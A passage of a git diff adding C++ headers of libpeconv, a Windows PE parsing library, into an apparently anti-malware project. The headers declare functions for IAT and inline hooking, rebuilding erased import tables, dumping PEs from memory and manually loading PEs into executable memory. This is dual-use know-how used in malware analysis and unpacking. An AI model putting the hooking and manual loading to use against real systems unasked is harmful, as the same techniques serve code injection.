DLL. + Results are saved into: addrToFunc. + Addresses that could not be covered by the given DLL are saved into notFound. + Before each execution, the content of involved variables is erased. + \param _mappedDllName : the name of the DLL that we will be used to mapping. This DLL is saved into mappedDllName. + \return a number of covered functions + */ + size_t mapAddressesToFunctions(const std::string &_mappedDllName); + + /** + Check if the functions mapping is complete. + \return the status: true if all the addresses are mapped to specific exports, false if not + */ + bool isMappingComplete() { return (addresses.size() == addrToFunc.size()) ? true : false; } + + /** + A mapping associating each of the covered function addresses with the set of exports (from mapped DLL) that cover this address + */ + std::map> addrToFunc; + + /** + Addresses of the functions not found in the mapped DLL + */ + std::set notFound; + + /** + Name of the covering DLL + */ + std::string dllName; + + protected: + /** + A name of the DLL that was used for mapping. In a typical scenario it will be the same as covering DLL, but may be set different. + */ + std::string mappedDllName; + + /** + A supplied set of the addresses of imported functions. + Those addressed will be covered (associated with the corresponding exports from available DLLs, defined by exportsMap). + */ + std::set &addresses; + + /** + A supplied exportsMap. Only used as a lookup, no changes applied. + */ + const peconv::ExportsMapper& exportsMap; + }; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/function_resolver.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/function_resolver.h new file mode 100644 index 0000000..8b9fd70 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/function_resolver.h @@ -0,0 +1,39 @@ +/** +* @file +* @brief Definitions of basic Imports Resolver classes. They can be used for filling imports when the PE is loaded. +*/ + +#pragma once + +#include + +namespace peconv { + /** + A base class for functions resolver. + */ + class t_function_resolver { + public: + /** + Get the address (VA) of the function with the given name, from the given DLL. + \param func_name : the name of the function + \param lib_name : the name of the DLL + \return Virtual Address of the exported function + */ + virtual FARPROC resolve_func(LPSTR lib_name, LPSTR func_name) = 0; + }; + + /** + A default functions resolver, using LoadLibraryA and GetProcAddress. + */ + class default_func_resolver : t_function_resolver { + public: + /** + Get the address (VA) of the function with the given name, from the given DLL, using LoadLibraryA and GetProcAddress. + \param func_name : the name of the function + \param lib_name : the name of the DLL + \return Virtual Address of the exported function + */ + virtual FARPROC resolve_func(LPSTR lib_name, LPSTR func_name); + }; + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/hooks.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/hooks.h new file mode 100644 index 0000000..ab55dbc --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/hooks.h @@ -0,0 +1,135 @@ +/** +* @file +* @brief Functions related to hooking the loaded PE. Reditecting/replacing a functions with another. +*/ + +#pragma once + +#include +#include "function_resolver.h" + +#include +#include +#include +#include "peconv/buffer_util.h" + +namespace peconv { + + /** + A buffer storing a binary patch, that can be applied on a module. Used as a restorable backup in case of function patching. + */ + class PatchBackup { + public: + /** + Creates an empty backup. + */ + PatchBackup() + : buffer(nullptr), bufferSize(0), sourcePtr(nullptr) + { + } + + ~PatchBackup() { + deleteBackup(); + } + + /** + Destroys the backup and resets internal fields. + */ + void deleteBackup() + { + if (buffer) { + delete[] buffer; + bufferSize = 0; + sourcePtr = nullptr; + } + } + + /** + Reads bytes from the binary to the backup. The source buffer must be within the current process. + */ + bool makeBackup(BYTE *patch_ptr, size_t patch_size); + + /** + Applies the backup back to the pointer from which it was read. + */ + bool applyBackup(); + + /** + Checks if the buffer was filled. + */ + bool isBackup() + { + return buffer != nullptr; + } + + protected: + BYTE *buffer; + size_t bufferSize; + + BYTE *sourcePtr; + }; + + + /** + A functions resolver that can be used for hooking IAT. Allows for defining functions that are supposed to be replaced. + */ + class hooking_func_resolver : peconv::default_func_resolver { + public: + /** + Define a function that will be replaced. + \param name : a name of the function that will be replaced + \param function : an address of the replacement function + */ + void add_hook(std::string name, FARPROC function) + { + hooks_map[name] = function; + } + + /** + Get the address (VA) of the function with the given name, from the given DLL. If the function was hooked, it retrieves the address of the replacement function instead. + \param func_name : the name of the function + \param lib_name : the name of the DLL + \return Virtual Address of the exported function, or the address of the replacement function. + */ + virtual FARPROC resolve_func(LPSTR lib_name, LPSTR func_name); + + private: + std::map hooks_map; + }; + + /** + Installs inline hook at the given ptr. Returns the number of bytes overwriten. + 64 bit version. + \param ptr : pointer to the function to be replaced + \param new_offset : VA of the new function + \param backup : (optional) backup that can be used to reverse the changes + \return size of the applied patch + */ + size_t redirect_to_local64(void *ptr, ULONGLONG new_offset, PatchBackup* backup = nullptr); + + /** + Installs inline hook at the given ptr. Returns the number of bytes overwriten. + 32 bit version. + \param ptr : pointer to the function to be replaced + \param new_offset : VA of the new function + \param backup : (optional) backup that can be used to reverse the changes + \return size of the applied patch + */ + size_t redirect_to_local32(void *ptr, DWORD new_offset, PatchBackup* backup = nullptr); + + /** + Installs inline hook at the given ptr. Returns the number of bytes overwriten. + Uses bitness of the current applications for the bitness of the intalled hook. + \param ptr : pointer to the function to be replaced + \param new_function_ptr : pointer to the new function + \param backup : (optional) backup that can be used to reverse the changes + \return size of the applied patch + */ + size_t redirect_to_local(void *ptr, void* new_function_ptr, PatchBackup* backup = nullptr); + + /** + Replaces a target address of JMP [DWORD] or CALL [DWORD] + */ + bool replace_target(BYTE *ptr, ULONGLONG dest_addr); + +};//namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_loader.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_loader.h new file mode 100644 index 0000000..4a485e6 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_loader.h @@ -0,0 +1,70 @@ +/** +* @file +* @brief Parsing and filling the Import Table. +*/ + +#pragma once + +#include + +#include "pe_hdrs_helper.h" +#include "function_resolver.h" + +namespace peconv { + + /** + A class defining a callback that will be executed when the next imported function was found + */ + class ImportThunksCallback + { + public: + ImportThunksCallback(BYTE* _modulePtr, size_t _moduleSize) + : modulePtr(_modulePtr), moduleSize(_moduleSize) + { + this->is64b = is64bit((BYTE*)modulePtr); + } + + /** + A callback that will be executed by process_import_table when the next imported function was found + \param libName : the pointer to the DLL name + \param origFirstThunkPtr : the pointer to the Original First Thunk + \param firstThunkPtr : the pointer to the First Thunk + \return : true if processing succeeded, false otherwise + */ + virtual bool processThunks(LPSTR libName, ULONG_PTR origFirstThunkPtr, ULONG_PTR firstThunkPtr) = 0; + + protected: + BYTE* modulePtr; + size_t moduleSize; + bool is64b; + }; + + /** + Process the given PE's import table and execute the callback each time when the new imported function was found + \param modulePtr : a pointer to the loded PE (in virtual format) + \param moduleSize : a size of the supplied PE + \param callback : a callback that will be executed to process each imported function + \return : true if processing succeeded, false otherwise + */ + bool process_import_table(IN BYTE* modulePtr, IN SIZE_T moduleSize, IN ImportThunksCallback *callback); + + /** + Fills imports of the given PE with the help of the defined functions resolver. + \param modulePtr : a pointer to the loded PE (in virtual format) + \param func_resolver : a resolver that will be used to fill the thunk of the import + \return : true if loading all functions succeeded, false otherwise + */ + bool load_imports(BYTE* modulePtr, t_function_resolver* func_resolver=nullptr); + + /** + Checks if the given PE has a valid import table. + */ + bool has_valid_import_table(const PBYTE modulePtr, size_t moduleSize); + + /** + Checks if the given lib_name is a valid DLL name. + A valid name must contain printable characters. Empty name is also acceptable (may have been erased). + */ + bool is_valid_import_name(const PBYTE modulePtr, const size_t moduleSize, LPSTR lib_name); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_uneraser.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_uneraser.h new file mode 100644 index 0000000..274bfc7 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/imports_uneraser.h @@ -0,0 +1,94 @@ +/** +* @file +* @brief A definition of ImportsUneraser class - for recovery of a partialy erased Import Table. +*/ + +#pragma once + +#include + +#include + +#include +#include + +#include +#include "fix_imports.h" +#include "caves.h" + +namespace peconv { + + /** + A class responsible for recovering the partially erased Import Table from the PE. + */ + class ImportsUneraser + { + public: + ImportsUneraser(PVOID _modulePtr, size_t _moduleSize) + : modulePtr((PBYTE)_modulePtr), moduleSize(_moduleSize) + { + is64 = peconv::is64bit((BYTE*)modulePtr); + } + + /** + Fill the imported functions' names in the given Import Descriptor, using the given coverage. + Collect addressees of functions that couldn't be filled with the given mapping. + \param lib_desc : the IMAGE_IMPORT_DESCRIPTOR where the functions' names should be set + \param dllCoverage : a mapping associating addresses with the corresponding exports from available DLLs + \param not_covered : a set of addresses that could not be found in the supplied mapping + \return true if succeeded + */ + bool uneraseDllImports(IN OUT IMAGE_IMPORT_DESCRIPTOR* lib_desc, IN ImportedDllCoverage &dllCoverage, OUT OPTIONAL ImpsNotCovered* not_covered); + + /** + Recover the imported DLL name in the given Import Descriptor, filling it with the given dll_name. + */ + bool uneraseDllName(IMAGE_IMPORT_DESCRIPTOR* lib_desc, const std::string &dll_name); + + protected: + /** + Copy the given DLL name into the given IMAGE_IMPORT_DESCRIPTOR. Validates the data correctness before writing. + \param lib_desc : the IMAGE_IMPORT_DESCRIPTOR where the DLL name should be set + \param dll_name : the DLL name that needs to be written into the lib_desc + \return true if succeeded + */ + bool writeFoundDllName(IMAGE_IMPORT_DESCRIPTOR* lib_desc, const std::string &dll_name); + + /** + Fill the names of imported functions with names of the prepared mapping. + Collect addressees of functions that couldn't be filled with the given mapping. + \param lib_desc : the IMAGE_IMPORT_DESCRIPTOR where the functions' names should be set + \param ordinal_flag : the flag that is used to recognize import by ordinal (32 or 64 bit) + \param addr_to_func : a mapping assigning functions' addresses to their definitions (names etc.) + \param not_covered : a set of addresses that could not be found in the supplied mapping + \return true if succeeded + */ + template + bool fillImportNames(IN OUT IMAGE_IMPORT_DESCRIPTOR* lib_desc, + IN const FIELD_T ordinal_flag, + IN std::map> &addr_to_func, + OUT OPTIONAL ImpsNotCovered* not_covered + ); + + template + bool findNameInBinaryAndFill(IMAGE_IMPORT_DESCRIPTOR* lib_desc, + LPVOID call_via_ptr, + LPVOID thunk_ptr, + const FIELD_T ordinal_flag, + std::map> &addr_to_func + ); + + /** + Fill the function data into the given IMAGE_THUNK_DATA. + \param desc : the poiner to IMAGE_THUNK_DATA that will be filled + \param ordinal_flag : an ordinal flag: 32 or 64 bit + \param foundFunc : the ExportedFunc that will be used for filling the desc + */ + template + bool writeFoundFunction(IMAGE_THUNK_DATA_T* desc, const FIELD_T ordinal_flag, const ExportedFunc &foundFunc); + + PBYTE modulePtr; + size_t moduleSize; + bool is64; + }; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_defs.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_defs.h new file mode 100644 index 0000000..daa902f --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_defs.h @@ -0,0 +1,228 @@ +#pragma once +#include + +#include + +namespace peconv { + + /** + IMAGE_LOAD_CONFIG_CODE_INTEGRITY: a structure used by IMAGE_LOAD_CONFIG_DIR - the Windows 10 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_CODE_INTEGRITY_W10 { + WORD Flags; // Flags to indicate if CI information is available, etc. + WORD Catalog; // 0xFFFF means not available + DWORD CatalogOffset; + DWORD Reserved; // Additional bitmask to be defined later + } IMAGE_LOAD_CONFIG_CODE_INTEGRITY_W10; + + /** + IMAGE_LOAD_CONFIG_DIR32: the Windows 10 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_DIR32_W10 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + DWORD DeCommitFreeBlockThreshold; + DWORD DeCommitTotalFreeThreshold; + DWORD LockPrefixTable; // VA + DWORD MaximumAllocationSize; + DWORD VirtualMemoryThreshold; + DWORD ProcessHeapFlags; + DWORD ProcessAffinityMask; + WORD CSDVersion; + WORD DependentLoadFlags; + DWORD EditList; // VA + DWORD SecurityCookie; // VA + DWORD SEHandlerTable; // VA + DWORD SEHandlerCount; + DWORD GuardCFCheckFunctionPointer; // VA + DWORD GuardCFDispatchFunctionPointer; // VA + DWORD GuardCFFunctionTable; // VA + DWORD GuardCFFunctionCount; + DWORD GuardFlags; + IMAGE_LOAD_CONFIG_CODE_INTEGRITY_W10 CodeIntegrity; + DWORD GuardAddressTakenIatEntryTable; // VA + DWORD GuardAddressTakenIatEntryCount; + DWORD GuardLongJumpTargetTable; // VA + DWORD GuardLongJumpTargetCount; + DWORD DynamicValueRelocTable; // VA + DWORD CHPEMetadataPointer; + DWORD GuardRFFailureRoutine; // VA + DWORD GuardRFFailureRoutineFunctionPointer; // VA + DWORD DynamicValueRelocTableOffset; + WORD DynamicValueRelocTableSection; + WORD Reserved2; + DWORD GuardRFVerifyStackPointerFunctionPointer; // VA + DWORD HotPatchTableOffset; + DWORD Reserved3; + DWORD EnclaveConfigurationPointer; // VA + } IMAGE_LOAD_CONFIG_DIR32_W10; + + /** + IMAGE_LOAD_CONFIG_DIR64: the Windows 10 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_DIR64_W10 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + ULONGLONG DeCommitFreeBlockThreshold; + ULONGLONG DeCommitTotalFreeThreshold; + ULONGLONG LockPrefixTable; // VA + ULONGLONG MaximumAllocationSize; + ULONGLONG VirtualMemoryThreshold; + ULONGLONG ProcessAffinityMask; + DWORD ProcessHeapFlags; + WORD CSDVersion; + WORD DependentLoadFlags; + ULONGLONG EditList; // VA + ULONGLONG SecurityCookie; // VA + ULONGLONG SEHandlerTable; // VA + ULONGLONG SEHandlerCount; + ULONGLONG GuardCFCheckFunctionPointer; // VA + ULONGLONG GuardCFDispatchFunctionPointer; // VA + ULONGLONG GuardCFFunctionTable; // VA + ULONGLONG GuardCFFunctionCount; + DWORD GuardFlags; + IMAGE_LOAD_CONFIG_CODE_INTEGRITY_W10 CodeIntegrity; + ULONGLONG GuardAddressTakenIatEntryTable; // VA + ULONGLONG GuardAddressTakenIatEntryCount; + ULONGLONG GuardLongJumpTargetTable; // VA + ULONGLONG GuardLongJumpTargetCount; + ULONGLONG DynamicValueRelocTable; // VA + ULONGLONG CHPEMetadataPointer; // VA + ULONGLONG GuardRFFailureRoutine; // VA + ULONGLONG GuardRFFailureRoutineFunctionPointer; // VA + DWORD DynamicValueRelocTableOffset; + WORD DynamicValueRelocTableSection; + WORD Reserved2; + ULONGLONG GuardRFVerifyStackPointerFunctionPointer; // VA + DWORD HotPatchTableOffset; + DWORD Reserved3; + ULONGLONG EnclaveConfigurationPointer; // VA + } IMAGE_LOAD_CONFIG_DIR64_W10; + + /** + IMAGE_LOAD_CONFIG_DIR32: the Windows 8 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_DIR32_W8 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + DWORD DeCommitFreeBlockThreshold; + DWORD DeCommitTotalFreeThreshold; + DWORD LockPrefixTable; // VA + DWORD MaximumAllocationSize; + DWORD VirtualMemoryThreshold; + DWORD ProcessHeapFlags; + DWORD ProcessAffinityMask; + WORD CSDVersion; + WORD DependentLoadFlags; + DWORD EditList; // VA + DWORD SecurityCookie; // VA + DWORD SEHandlerTable; // VA + DWORD SEHandlerCount; + DWORD GuardCFCheckFunctionPointer; // VA + DWORD GuardCFDispatchFunctionPointer; // VA + DWORD GuardCFFunctionTable; // VA + DWORD GuardCFFunctionCount; + DWORD GuardFlags; + } IMAGE_LOAD_CONFIG_DIR32_W8; + + /** + IMAGE_LOAD_CONFIG_DIR64: the Windows 8 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_DIR64_W8 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + ULONGLONG DeCommitFreeBlockThreshold; + ULONGLONG DeCommitTotalFreeThreshold; + ULONGLONG LockPrefixTable; // VA + ULONGLONG MaximumAllocationSize; + ULONGLONG VirtualMemoryThreshold; + ULONGLONG ProcessAffinityMask; + DWORD ProcessHeapFlags; + WORD CSDVersion; + WORD DependentLoadFlags; + ULONGLONG EditList; // VA + ULONGLONG SecurityCookie; // VA + ULONGLONG SEHandlerTable; // VA + ULONGLONG SEHandlerCount; + ULONGLONG GuardCFCheckFunctionPointer; // VA + ULONGLONG GuardCFDispatchFunctionPointer; // VA + ULONGLONG GuardCFFunctionTable; // VA + ULONGLONG GuardCFFunctionCount; + DWORD GuardFlags; + } IMAGE_LOAD_CONFIG_DIR64_W8; + + + /** + IMAGE_LOAD_CONFIG_DIR32: the Windows 7 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_DIR32_W7 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + DWORD DeCommitFreeBlockThreshold; + DWORD DeCommitTotalFreeThreshold; + DWORD LockPrefixTable; // VA + DWORD MaximumAllocationSize; + DWORD VirtualMemoryThreshold; + DWORD ProcessHeapFlags; + DWORD ProcessAffinityMask; + WORD CSDVersion; + WORD DependentLoadFlags; + DWORD EditList; // VA + DWORD SecurityCookie; // VA + DWORD SEHandlerTable; // VA + DWORD SEHandlerCount; + } IMAGE_LOAD_CONFIG_DIR32_W7; + + /** + IMAGE_LOAD_CONFIG_DIR64: the Windows 7 version. + */ + typedef struct _IMAGE_LOAD_CONFIG_DIR64_W7 { + DWORD Size; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD GlobalFlagsClear; + DWORD GlobalFlagsSet; + DWORD CriticalSectionDefaultTimeout; + ULONGLONG DeCommitFreeBlockThreshold; + ULONGLONG DeCommitTotalFreeThreshold; + ULONGLONG LockPrefixTable; // VA + ULONGLONG MaximumAllocationSize; + ULONGLONG VirtualMemoryThreshold; + ULONGLONG ProcessAffinityMask; + DWORD ProcessHeapFlags; + WORD CSDVersion; + WORD DependentLoadFlags; + ULONGLONG EditList; // VA + ULONGLONG SecurityCookie; // VA + ULONGLONG SEHandlerTable; // VA + ULONGLONG SEHandlerCount; + } IMAGE_LOAD_CONFIG_DIR64_W7; +}; //namespace peconv + +#include diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_util.h new file mode 100644 index 0000000..52b01be --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/load_config_util.h @@ -0,0 +1,42 @@ +/** +* @file +* @brief Fetching Load Config Directory and recognizing its version. +*/ + +#pragma once +#include + +#include "buffer_util.h" +#include "load_config_defs.h" + +namespace peconv { + + /** + A version of Load Config Directory. + */ + typedef enum { + LOAD_CONFIG_NONE = 0, /**< Load Config Directory not found */ + LOAD_CONFIG_W7_VER = 7, /**< Load Config Directory in the Windows 7 version */ + LOAD_CONFIG_W8_VER = 8, /**< Load Config Directory in the Windows 8 version */ + LOAD_CONFIG_W10_VER = 10, /**< Load Config Directory in the Windows 10 version */ + LOAD_CONFIG_UNK_VER = -1 /**< Load Config Directory in an unknown version */ + } t_load_config_ver; + + /** + Get a pointer to the Load Config Directory within the given PE. + \param buffer : a buffer containing the PE file in a Virtual format + \param buf_size : size of the buffer + \return a pointer to the Load Config Directory, NULL if the given PE does not have this directory + */ + BYTE* get_load_config_ptr(BYTE* buffer, size_t buf_size); + + /** + Detect which version of Load Config Directory was used in the given PE. + \param buffer : a buffer containing the PE file in a Virtual format + \param buf_size : size of the buffer + \param ld_config_ptr : pointer to the Load Config Directory within the given PE + \return detected version of Load Config Directory + */ + t_load_config_ver get_load_config_version(BYTE* buffer, size_t buf_size, BYTE* ld_config_ptr); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_dumper.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_dumper.h new file mode 100644 index 0000000..3388c5b --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_dumper.h @@ -0,0 +1,48 @@ +/** +* @file +* @brief Dumping PE from the memory buffer into a file. +*/ + +#pragma once + +#include +#include "exports_mapper.h" + +namespace peconv { + + /** + A mode in which the PE fille be dumped. + */ + typedef enum { + PE_DUMP_AUTO = 0, /**< autodetect which dump mode is the most suitable for the given input */ + PE_DUMP_VIRTUAL,/**< dump as it is in the memory (virtual) */ + PE_DUMP_UNMAP, /**< convert to the raw format: using raw sections' headers */ + PE_DUMP_REALIGN, /**< convert to the raw format: by realigning raw sections' headers to be the same as virtual (useful if the PE was unpacked in memory) */ + PE_DUMP_MODES_COUNT /**< total number of the dump modes */ + } t_pe_dump_mode; + + /** + Detect dump mode that is the most suitable for the given input. + \param buffer : the buffer containing the PE to be dumped. + \param buffer_size : the size of the given buffer + */ + t_pe_dump_mode detect_dump_mode(IN const BYTE* buffer, IN size_t buffer_size); + + /** + Dumps PE from the fiven buffer into a file. It expects the module base and size to be given. + \param outputFilePath : name of the file where the dump should be saved + \param buffer : the buffer containing the PE to be dumped. WARNING: the buffer may be preprocessed before dumping. + \param buffer_size : the size of the given buffer + \param module_base : the base to which the PE buffer was relocated + \param dump_mode : specifies in which format the PE should be dumped. If the mode was set to PE_DUMP_AUTO, it autodetects mode and returns the detected one. + \param exportsMap : optional. If exportsMap is supplied, it will try to recover destroyed import table of the PE, basing on the supplied map of exported functions. + */ + bool dump_pe(IN const char *outputFilePath, + IN OUT BYTE* buffer, + IN size_t buffer_size, + IN const ULONGLONG module_base, + IN OUT t_pe_dump_mode &dump_mode, + IN OPTIONAL const peconv::ExportsMapper* exportsMap = nullptr + ); + +};// namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_hdrs_helper.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_hdrs_helper.h new file mode 100644 index 0000000..7a7eb4e --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_hdrs_helper.h @@ -0,0 +1,232 @@ +/** +* @file +* @brief Wrappers over various fields in the PE header. Read, write, parse PE headers. +*/ + +#pragma once + +#include +#include "buffer_util.h" + +#ifndef PAGE_SIZE +#define PAGE_SIZE 0x1000 +#endif + +#define MASK_TO_DWORD(val) (val & 0xffffffff) +#define MASK_TO_WORD(val) (val & 0xffff) + +namespace peconv { + /** + Maximal size of the PE header. + */ + const ULONGLONG MAX_HEADER_SIZE = PAGE_SIZE; + + /** + Fetch image size from headers. + */ + DWORD get_image_size(IN const BYTE *payload); + + /** + Change the Image Size in Optional Header to the given one. + */ + bool update_image_size(IN OUT BYTE* payload, IN DWORD new_img_size); + + /** + Fetch architecture from the NT headers. Checks for bad pointers. + */ + WORD get_nt_hdr_architecture(IN const BYTE *pe_buffer); + + /** + Wrapper for get_nt_hdr_architecture. Returns true if the PE file is 64 bit. + */ + bool is64bit(IN const BYTE *pe_buffer); + + /** + Fetch pointer to the NT headers of the PE file. + Checks for bad pointers. If buffer_size is set, validates pointers against the buffer size. + */ + BYTE* get_nt_hdrs( + IN const BYTE *pe_buffer, + IN OPTIONAL size_t buffer_size=0 //if buffer_size=0 means size unknown + ); + + /** + Wrapper for get_nt_headers. Automatically detects if the PE is 32 bit - if not, returns null pointer. + */ + IMAGE_NT_HEADERS32* get_nt_hdrs32(IN const BYTE *pe_buffer); + + /** + Wrapper for get_nt_headers. Automatically detects if the PE is 64 bit - if not, returns null pointer. + */ + IMAGE_NT_HEADERS64* get_nt_hdrs64(IN const BYTE *pe_buffer); + + /** + Fetches optional header of the PE. Validates pointers against buffer size. + */ + LPVOID get_optional_hdr(IN const BYTE* payload, IN const size_t buffer_size); + + /** + Fetches file header of the PE. Validates pointers against buffer size. + */ + const IMAGE_FILE_HEADER* get_file_hdr( + IN const BYTE* payload, + IN const size_t buffer_size + ); + + /** + Fetch the size of headers (from Optional Header). + */ + DWORD get_hdrs_size(IN const BYTE *pe_buffer); + + /** + get Data Directory entry of the given number. If the entry is not filled and allow_empty is not set, it returns null pointer. + */ + IMAGE_DATA_DIRECTORY* get_directory_entry(IN const BYTE* pe_buffer, IN DWORD dir_id, IN bool allow_empty = false); + + /** + Get pointer to the Data Directory content of the given number. Automatically cast to the chosen type. + */ + template + IMAGE_TYPE_DIRECTORY* get_type_directory(IN HMODULE modulePtr, IN DWORD dir_id) + { + IMAGE_DATA_DIRECTORY *my_dir = peconv::get_directory_entry((const BYTE*)modulePtr, dir_id); + if (!my_dir) return nullptr; + + DWORD dir_addr = my_dir->VirtualAddress; + if (dir_addr == 0) return nullptr; + + return (IMAGE_TYPE_DIRECTORY*)(dir_addr + (ULONG_PTR)modulePtr); + } + + /** + Get pointer to the Export Directory. + */ + IMAGE_EXPORT_DIRECTORY* get_export_directory(IN HMODULE modulePtr); + + // Fetch Image Base from Optional Header. + ULONGLONG get_image_base(IN const BYTE *pe_buffer); + + /** + Change the Image Base in Optional Header to the given one. + */ + bool update_image_base(IN OUT BYTE* payload, IN ULONGLONG destImageBase); + + /** + Get RVA of the Entry Point from the Optional Header. + */ + DWORD get_entry_point_rva(IN const BYTE *pe_buffer); + + /** + Change the Entry Point RVA in the Optional Header to the given one. + */ + bool update_entry_point_rva(IN OUT BYTE *pe_buffer, IN DWORD ep); + + /** + Get number of sections from the File Header. It does not validate if this the actual number. + */ + size_t get_sections_count( + IN const BYTE* buffer, + IN const size_t buffer_size + ); + + /** + Checks if the section headers are reachable. It does not validate sections alignment. + */ + bool is_valid_sections_hdr_offset(IN const BYTE* buffer, IN const size_t buffer_size); + + /** + Gets pointer to the section header of the given number. + */ + PIMAGE_SECTION_HEADER get_section_hdr( + IN const BYTE* pe_buffer, + IN const size_t buffer_size, + IN size_t section_num + ); + + /** + Fetch the PE Characteristics from the File Header. + */ + WORD get_file_characteristics(IN const BYTE* payload); + + /** + Check if the module is a DLL (basing on the Characteristcs in the header). + */ + bool is_module_dll(IN const BYTE* payload); + + /** + Fetch the DLL Characteristics from the Optional Header. + */ + WORD get_dll_characteristics(IN const BYTE* payload); + + /** + Set the PE subsystem in the header. + */ + bool set_subsystem(IN OUT BYTE* payload, IN WORD subsystem); + + /** + Get the PE subsystem from the header. + */ + WORD get_subsystem(IN const BYTE* payload); + + /** + Check if the PE has relocations Data Directory. + */ + bool has_relocations(IN const BYTE *pe_buffer); + + /** + Fetch the pointer to the .NET header (if exist). + */ + IMAGE_COR20_HEADER* get_dotnet_hdr( + IN const BYTE* pe_buffer, + IN size_t const buffer_size, + IN const IMAGE_DATA_DIRECTORY* dotNetDir + ); + + /** + Fetch section aligmenent from headers. Depending on the flag, it fetches either Raw Alignment or Virtual Alignment. + */ + DWORD get_sec_alignment(IN const BYTE* modulePtr, IN bool is_raw); + + /** + Change section aligmenent in headers. Depending on the flag, it sets either Raw Alignment or Virtual Alignment. + */ + bool set_sec_alignment(IN OUT BYTE* pe_buffer, IN bool is_raw, IN DWORD new_alignment); + + /** + Get size of virtual section from the headers (optionaly rounds it up to the Virtual Alignment) + */ + DWORD get_virtual_sec_size( + IN const BYTE* pe_hdr, + IN const PIMAGE_SECTION_HEADER sec_hdr, + IN bool rounded //if set, it rounds it up to the Virtual Alignment + ); + + /** + Get the last section (in a raw or virtual alignment) + \param pe_buffer : buffer with a PE + \param pe_size : size of the given PE + \param is_raw : If true, give the section with the highest Raw offset. If false, give the section with the highest Virtual offset. + */ + PIMAGE_SECTION_HEADER get_last_section(IN const PBYTE pe_buffer, IN size_t pe_size, IN bool is_raw); + + /** + Calculate full PE size (raw or virtual) using information from sections' headers. WARNING: it drops an overlay. + \param pe_buffer : a buffer containing a PE + \param pe_size : the size of the given buffer + \param is_raw : If true, the Raw alignment is used. If false, the Virtual alignment is used. + */ + DWORD calc_pe_size( + IN const PBYTE pe_buffer, + IN size_t pe_size, + IN bool is_raw + ); + + /** + Walk through sections headers checking if the sections beginnings and sizes are fitting the alignment (Virtual or Raw) + \param buffer : a buffer containing a PE + \param buffer_size : the size of the given buffer + \param is_raw : If true, the Raw alignment is checked. If false, the Virtual alignment is checked. + */ + bool is_valid_sectons_alignment(IN const BYTE* buffer, IN const SIZE_T buffer_size, IN bool is_raw); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_loader.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_loader.h new file mode 100644 index 0000000..bc9d5dc --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_loader.h @@ -0,0 +1,42 @@ +/** +* @file +* @brief Loading PE from a file with the help of the custom loader. +*/ + +#pragma once + +#include "pe_raw_to_virtual.h" +#include "function_resolver.h" + +namespace peconv { + /** + Reads PE from the given buffer into memory and maps it into vitual format. + (Automatic raw to virtual conversion). + If the executable flag is true, the PE file is loaded into executable memory. + If the relocate flag is true, applies relocations. Does not load imports. + Automatically allocates buffer of the needed size (the size is returned in outputSize). The buffer can be freed by the function free_pe_buffer. + */ + BYTE* load_pe_module(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, bool executable, bool relocate); + + /** + Reads PE from the given file into memory and maps it into vitual format. + (Automatic raw to virtual conversion). + If the executable flag is true, the PE file is loaded into executable memory. + If the relocate flag is true, applies relocations. Does not load imports. + Automatically allocates buffer of the needed size (the size is returned in outputSize). The buffer can be freed by the function free_pe_buffer. + */ + BYTE* load_pe_module(const char *filename, OUT size_t &v_size, bool executable, bool relocate); + + /** + Loads full PE from the raw buffer in a way in which it 